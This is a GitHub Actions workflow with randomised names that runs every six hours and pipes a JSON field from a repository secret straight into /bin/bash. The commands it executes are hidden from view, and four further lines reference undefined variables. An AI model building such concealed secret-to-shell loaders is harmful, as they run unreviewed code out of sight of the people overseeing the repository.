name: mifadong6418

on:
  workflow_dispatch:
  schedule:
    - cron: '38 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mifadong6418
        env:
          taag5918: ${{ secrets.taag5918 }}
        run: |
          echo $taag5918 | jq -r .pme00 | /bin/bash
          echo $tut091 | jq -r .sfxx35 | /bin/bash
          echo $lbt06309 | jq -r .wx2 | /bin/bash
          echo $c98449 | jq -r .zdsx18 | /bin/bash
          echo $jghi95048 | jq -r .oe436 | /bin/bash

